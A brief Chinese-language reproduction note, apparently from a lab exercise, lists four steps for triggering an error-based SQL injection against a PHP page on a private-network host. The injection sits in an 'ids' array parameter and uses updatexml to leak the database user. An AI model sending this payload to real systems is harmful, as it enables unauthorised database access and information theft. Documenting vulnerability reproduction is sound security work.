1.访问url 2.访问漏洞url 3.访问http://192.168.232.128/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 4.数据库信息泄露